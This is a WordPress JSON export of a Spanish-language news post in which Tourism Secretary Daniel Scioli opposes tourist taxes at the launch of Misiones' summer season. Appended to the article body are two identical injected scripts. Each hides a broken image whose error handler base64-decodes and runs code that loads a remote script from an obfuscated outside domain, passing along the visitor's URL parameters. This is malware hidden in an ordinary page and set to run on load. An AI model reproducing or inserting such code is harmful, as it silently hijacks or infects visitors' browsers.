{"id":4698,"date":"2024-12-16T19:55:02","date_gmt":"2024-12-16T22:55:02","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=4698"},"modified":"2025-08-13T23:43:25","modified_gmt":"2025-08-14T02:43:25","slug":"scioli-pidio-a-municipios-y-provincias-no-aplicar-tasas-a-turistas-porque-afectan-la-competitividad-del-sector","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=4698","title":{"rendered":"Scioli pidi\u00f3 a municipios y provincias no aplicar tasas a turistas porque afectan la competitividad del sector"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-d7f22272fb3be320b4374191902ef0e9\" style=\"background-color:#103246\"><em>Tambi\u00e9n destac\u00f3 que la gesti\u00f3n del presidente Javier Milei promueve la desregulaci\u00f3n y la reducci\u00f3n de impuestos, as\u00ed como tambi\u00e9n la baja de la inflaci\u00f3n y de la tasa de inter\u00e9s.<\/em><\/h4>\n\n\n\n<p>El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;<strong>Daniel Scioli<\/strong>, critic\u00f3 hoy la creaci\u00f3n de tasas que graven la actividad tur\u00edstica y advirti\u00f3 sobre la importancia de \u201c<em>no matar a la gallina de los huevos de oro que representa el turismo, generador de puestos de trabajo genuinos y sustentables en todo el pa\u00eds<\/em>\u201d.<\/p>\n\n\n\n<p>De esa forma el&nbsp;<strong>funcionario<\/strong>&nbsp;se refiri\u00f3, en particular, al proyecto en tratamiento para aplicar un impuesto al turista en Ushuaia. \u201c<em>El Gobierno nacional est\u00e1 generando las condiciones para que el turismo gane competitividad, con desregulaciones muy necesarias y sacando tasas absurdas, y el sector privado est\u00e1 haciendo todos los esfuerzos para lograrlo. Entonces es il\u00f3gico que alguien pueda pensar en una nueva tasa que grave la actividad tur\u00edstica. No cuenten conmigo si decimos que la Argentina est\u00e1 cara y creamos una tasa por la tentaci\u00f3n de recaudar<\/em>\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>Scioli particip\u00f3 hoy del lanzamiento de la&nbsp;<strong>temporada de verano de Misiones<\/strong>en la Casa de la Provincia en Buenos Aires, ocasi\u00f3n en la que tambi\u00e9n destac\u00f3 que \u201c*se est\u00e1 revirtiendo el clima de fracaso que se hab\u00eda instalado en relaci\u00f3n con la temporada de verano**\u201d.<\/p>\n\n\n\n<p>\u201c<strong>Estamos acompa\u00f1ando a cada provincia y a cada destino tur\u00edstico de nuestro pa\u00eds en el lanzamiento de sus temporadas<\/strong>, explicando c\u00f3mo se est\u00e1n preparando para recibir a los turistas\u201d, puntualiz\u00f3.<\/p>\n\n\n\n<p>En ese marco,&nbsp;<strong>Scioli<\/strong>&nbsp;tambi\u00e9n subray\u00f3 que la ca\u00edda de la inflaci\u00f3n hizo posible el lanzamiento de programas de cr\u00e9dito en 18 cuotas sin inter\u00e9s para que las familias puedan disfrutar de sus vacaciones, \u201c<em>un financiamiento que era imposible cuando el presidente Javier Milei asumi\u00f3<\/em>\u201d.<\/p>\n\n\n\n<p>En tanto, la subsecretaria de Turismo de la Naci\u00f3n,&nbsp;<strong>Yanina Mart\u00ednez<\/strong>, aprovech\u00f3 la ocasi\u00f3n \u201c<em>para invitarlos a que elijan la Argentina, a que recorran nuestro pa\u00eds, que lo tiene todo<\/em>\u201d y puntualiz\u00f3 que \u201c<em>tambi\u00e9n Misiones tiene todo para ofrecer a los turistas nacionales y extranjeros, con destinos consolidados como Iguaz\u00fa, una de las Siete Maravillas Naturales del Mundo, y emergentes, como Campo Ram\u00f3n, que recibi\u00f3 un upgrade de ONU Turismo para llegar a ser uno de los mejores pueblos del mundo el pr\u00f3ximo a\u00f1o<\/em>\u00ab.<\/p>\n\n\n\n<p>Por su parte, el ministro de Turismo de Misiones,&nbsp;<strong>Jos\u00e9 Mar\u00eda Arr\u00faa<\/strong>, present\u00f3 la campa\u00f1a promocional de la provincia (<strong>\u00abTu Misiones\u201d, con el slogan \u201cMisiones, hacela tuya\u201d<\/strong>), dijo que \u201c<em>estamos ante un nuevo desaf\u00edo, que no solo es el de disfrutar sino el de cuidar la biodiversidad\u201d y pidi\u00f3 \u201cacompa\u00f1ar a Misiones todo el a\u00f1o, porque tiene toda la diversidad tur\u00edstica<\/em>\u00ab.<\/p>\n\n\n\n<p>Finalmente, el presidente de la C\u00e1mara Argentina de Turismo (CAT),&nbsp;<strong>Gustavo Hani<\/strong>, inst\u00f3 a \u201c<em>sostener el turismo de Misiones todo el a\u00f1o\u201d y a \u201cdefender los destinos de nuestro pa\u00eds contra los de afuera<\/em>\u201d.<\/p>\n\n\n\n<p>Tambi\u00e9n estuvo presente la directora de la Casa de Misiones en Ciudad de Buenos Aires,&nbsp;<strong>Miriam Duran.<\/strong><\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.argentina.gob.ar\/noticias\/scioli-pidio-municipios-y-provincias-no-aplicar-tasas-turistas-porque-afectan-la\" target=\"_blank\" rel=\"noreferrer noopener\"><img decoding=\"async\" src=\"https:\/\/www.argentina.gob.ar\/profiles\/argentinagobar\/themes\/argentinagobar\/argentinagobar_theme\/logo_argentina-azul.svg\" alt=\"\" style=\"width:280px;height:auto\"\/><\/a><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Tambi\u00e9n destac\u00f3 que la gesti\u00f3n del presidente Javier Milei promueve la desregulaci\u00f3n y la reducci\u00f3n de impuestos, as\u00ed como tambi\u00e9n la baja de la inflaci\u00f3n y de la tasa de inter\u00e9s. El secretario de Turismo, Ambiente y Deportes de la Naci\u00f3n,&nbsp;Daniel Scioli, critic\u00f3 hoy la creaci\u00f3n de tasas que graven la actividad tur\u00edstica y advirti\u00f3 [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":4699,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[1],"tags":[],"class_list":{"0":"post-4698","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-sin-categorizar"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4698"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4698"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4698\/revisions"}],"predecessor-version":[{"id":6609,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4698\/revisions\/6609"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4699"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4698"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4698"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4698"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}